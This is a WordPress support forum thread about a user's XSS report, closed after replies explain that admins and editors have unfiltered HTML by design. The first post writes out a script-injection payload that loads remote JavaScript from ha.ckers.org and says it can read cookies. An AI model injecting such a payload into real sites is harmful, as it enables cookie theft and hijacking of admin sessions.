[resolved] Huge Security Risk - how come nobody fixed that yet? (5 posts)

  1. euromark
    Posted 5 years ago #

    http://ha.ckers.org/xss.html has some test strings (they are harmless). But others might not be!

    So how come nobody solves this security risk yet?
    its as easy as htmlspecialchars() every comment / user input.

    See these examples:
    they are triggered in the backend as well as in the frontend (and can inject very dangerous code).

    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    the result is:
    a) reading out all cookie data: "This is remote text via xss.js located at ha.ckers.org wp-settings-1=..."
    b) breaking the layout (white screen of death)
    c) and other
    and this is not even close to what xss is capable of. just an example.
    usually the admin is not aware of it and the "dangerous code" has full admin rights as well. all get/ajax related requests could be triggered automatically with full admin rights.

  2. Have you reported this yet? http://codex.wordpress.org/Security_FAQ

  3. euromark
    Posted 5 years ago #

    i would have thought that somebody already found that out - with 100000 of distributions so far...^^

    for the public area i can install a code highlight plugin. some are capable of securing the output (most are not!).
    but for the admin area i am not sure how to implement security hacks.

    just started to use wordpress - and i am shocked.
    those things are absolutely standard procedure in every web project

  4. Chris_K
    Posted 5 years ago #

    @euromark -- were you logged in to WordPress at the time?

    From Peter Westwood:

    This reads very much like the standard report of XSS issues which are only present when you are logged in as an admin as you are inherently a trusted user.

    The place to to point the user is this FAQ entry - http://codex.wordpress.org/Security_FAQ#Why_are_some_users_allowed_to_post_unfiltered_HTML.3F

    Then ask them to report to security@wordpress.org if they find a real issue using a non-admin / editor user

  5. Agreed, Admins and Editors have the unfiltered html capability, and yes, they can insert bad code. But if you don't have the user role to do that, then you can't do that.

    Make a new user lower than an Editor, then try your attack as that user. If it works, let us know.

Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.